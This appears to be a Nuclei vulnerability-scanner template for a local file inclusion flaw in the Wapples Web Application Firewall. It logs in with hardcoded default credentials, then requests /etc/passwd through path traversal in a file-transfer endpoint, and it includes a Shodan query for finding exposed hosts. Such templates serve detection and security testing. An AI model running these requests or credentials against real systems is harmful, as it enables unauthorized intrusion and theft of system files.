id: wapples-firewall-lfi info: name: Wapples Web Application Firewall - Local File Inclusion author: For3stCo1d severity: high description: Wapples Web Application Firewall is vulnerable to local file inclusion. reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: verified: true shodan-query: http.title:"Intelligent WAPPLES" tags: wapples,firewall,lfi,authenticated requests: - raw: - | POST /webapi/auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded id={{username}}&password={{password}} - | GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded attack: pitchfork payloads: username: - systemi password: - db/wp.no1 cookie-reuse: true matchers: - type: regex regex: - "root:[x*]:0:0" # Enhanced by mp on 2023/01/15